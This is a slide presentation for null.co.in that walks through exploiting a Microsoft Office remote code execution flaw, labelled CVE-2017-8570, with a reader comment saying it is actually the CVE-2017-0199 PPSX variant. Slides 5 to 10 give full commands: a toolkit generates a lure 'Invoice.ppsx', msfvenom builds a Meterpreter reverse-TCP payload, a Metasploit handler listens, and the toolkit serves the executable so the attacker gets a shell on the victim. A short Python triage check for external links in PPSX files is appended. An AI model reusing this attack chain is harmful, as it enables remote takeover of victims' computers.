
CVE-2017-8570 presentation

Presentation for the null.co.in

Reader comment:
  • The PoC created by bhdresh is actually the CVE-2017-0199 PPSX version. It is not using Composite Moniker. I have confirmed by testing it on a machine patched till May 2017 and it is not working. Most probably it was a mistake to name it CVE-2017-8570. Please confirm it at your end before the presentation.

  1. CVE-2017-8570. Created by github.com/bhdresh
  2. Introduction:
     • CVE: Common Vulnerabilities and Exposures (CVE-2017-8570)
     • CVE-2017-8570 is a remote code execution vulnerability that exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploits the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on user with the same permissions as the current user. Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
  3. Scenario:
  4. Requirements: Kali Linux, Metasploit (with its database server running), and a victim machine (in our case Windows 7 with Microsoft Office 2013 x64 installed).
  5. Guide:
     • 1) Generate the malicious PPSX file (in the /tmp/CVE directory):
     • # python2.7 cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.2.15/logo.doc
  6. Guide cont’d: Generate the payload with msfvenom.
     • # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > /tmp/shell.exe
  7. Guide cont’d: Start the Metasploit database server.
     • Notice: This is an important step. This service should be running, because without it the Metasploit framework cannot connect to its database.
     • service postgresql start
  8. Guide cont’d: Start msfconsole with the handler (in the /tmp directory):
     • # msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.0.2.15; run"
  9. Guide cont’d: Start the toolkit in exploit mode to deliver the local payload (in the /tmp/CVE directory). It will listen on port 80.
     • # python2.7 cve-2017-8570_toolkit.py -M exp -e http://10.0.2.15/shell.exe -l /tmp/shell.exe
  10. The connection is established.
     • Now you can use any Meterpreter command on the victim’s PC.
  11. Patch:
     • In the most recent Microsoft Office security update, Microsoft released a patch that prevents this exploit.
     • One more thing: I tried transferring this presentation through Gmail and it did not work; in my opinion, Gmail is removing the executable content from the presentation. Moreover, it shows a warning that similar files have been used to steal personal information.
  12. Example:
  13. That’s it. Thank you. Any questions?
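Whichever bug the generated Invoice.ppsx actually triggers (the reader comment above argues it is the CVE-2017-0199 PPSX variant), the -u URL has to be referenced from inside the document, and in remote-link PPSX files of that family it is carried in an OOXML relationship part with TargetMode="External". The following triage check is an added example, not the presenter's or the toolkit's code: it unpacks the PPSX zip and lists every relationship whose target is an external http(s) URL. The sample document it builds is a constructed, minimal zip (one slide rels part with an oleObject relationship), not a real exploit file.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# Namespace used by every *.rels part in an OOXML package (PPSX is OOXML).
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def external_targets(ppsx_bytes):
    """Return (rels_part, relationship_type, target) for every relationship
    in the package that is marked External and points at an http(s) URL.
    Documents that embed their payload entirely inline are not flagged."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and re.match(r"(?i)https?://", target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, target))
    return hits


def build_sample(target, external=True):
    """Constructed sample: a minimal PPSX-like zip whose slide1 rels part
    carries a benign slideLayout link plus one oleObject relationship."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}/oleObject" Target="{target}"{mode}/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Sample URL mirrors the one used on slide 5 (constructed lab address).
    for hit in external_targets(build_sample("http://10.0.2.15/logo.doc")):
        print("external link:", hit)
```

Run the function over a real file with `external_targets(open("Invoice.ppsx", "rb").read())`; an oleObject relationship whose target is a remote URL is the indicator worth escalating.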
